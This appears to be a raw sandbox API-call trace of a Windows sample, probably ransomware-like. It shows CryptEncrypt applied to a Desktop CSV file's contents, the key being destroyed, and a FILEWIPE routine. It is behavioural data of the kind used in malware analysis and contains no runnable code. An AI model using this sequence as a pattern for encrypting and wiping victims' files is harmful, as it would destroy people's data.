RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0032.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0032.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0032.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0032.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0032.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0032.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0032.043] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0032.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c820 [0032.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0032.044] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0032.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0032.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0032.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0032.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0032.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0032.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0032.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0032.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0032.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0032.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0032.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0032.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0032.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0032.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0032.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0032.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0032.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0032.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0032.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0032.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0032.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0032.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0032.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0032.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0032.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0032.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0032.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0032.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0032.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0032.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0032.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0032.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0032.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0032.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0032.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0032.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0032.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0032.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0032.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0032.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0032.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0032.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0032.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0032.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0032.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0032.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0032.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0032.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0032.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0032.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0032.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0032.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0032.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0032.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0032.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0032.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0032.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0032.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0032.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0032.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0032.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0032.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0032.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0032.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0032.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0032.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0032.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0032.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0032.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0032.047] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0032.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0032.047] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da2b8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da2b8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0032.047] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.047] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.047] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.047] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.047] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.047] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0032.047] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.047] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.047] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0032.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0032.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0032.047] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.047] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0032.047] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0032.050] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0032.050] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.050] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0032.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0032.050] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.050] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0032.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0032.050] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0032.050] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.050] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x93d0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x93e0) returned 1 [0032.050] CharLowerBuffW (in: lpsz="byte[37857]", cchLength=0xb | out: lpsz="byte[37857]") returned 0xb [0032.051] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.051] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.051] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x960b98*, pdwDataLen=0x6ae220*=0x93d0, dwBufLen=0x93e0 | out: pbData=0x960b98*, pdwDataLen=0x6ae220*=0x93e0) returned 1 [0032.052] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0032.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0032.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.052] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0032.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.052] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.055] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0032.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.055] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.055] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.055] CryptDestroyKey (hKey=0x7c2280) returned 1 [0032.055] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0032.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0032.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0032.055] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0032.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0032.055] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.056] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0032.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0032.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.056] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0032.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.056] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0032.056] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0032.056] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0032.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0032.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0032.056] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.056] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0032.056] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.056] FreeLibrary (hLibModule=0x754b0000) returned 1 [0032.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0032.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0032.057] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0032.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0032.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0032.058] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WPwH2Letaqsal.csv", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87352130, ftCreationTime.dwHighDateTime=0x1d5c596, ftLastAccessTime.dwLowDateTime=0xb2371be0, ftLastAccessTime.dwHighDateTime=0x1d5b6f0, ftLastWriteTime.dwLowDateTime=0xb2371be0, ftLastWriteTime.dwHighDateTime=0x1d5b6f0, nFileSizeHigh=0x0, nFileSizeLow=0x93d0, dwReserved0=0x0, dwReserved1=0x777648, cFileName="WPwH2Letaqsal.csv", cAlternateFileName="WPWH2L~1.CSV")) returned 0x7c2240 [0032.058] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0032.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0032.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0032.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0032.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0032.058] CharLowerBuffW (in: lpsz="byte[37840]", cchLength=0xb | out: lpsz="byte[37840]") returned 0xb [0032.058] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0032.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0032.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0032.059] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0032.059] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0032.059] FreeLibrary (hLibModule=0x76b40000) returned 1 [0032.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0032.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0032.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0032.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0032.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0032.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0032.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0032.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 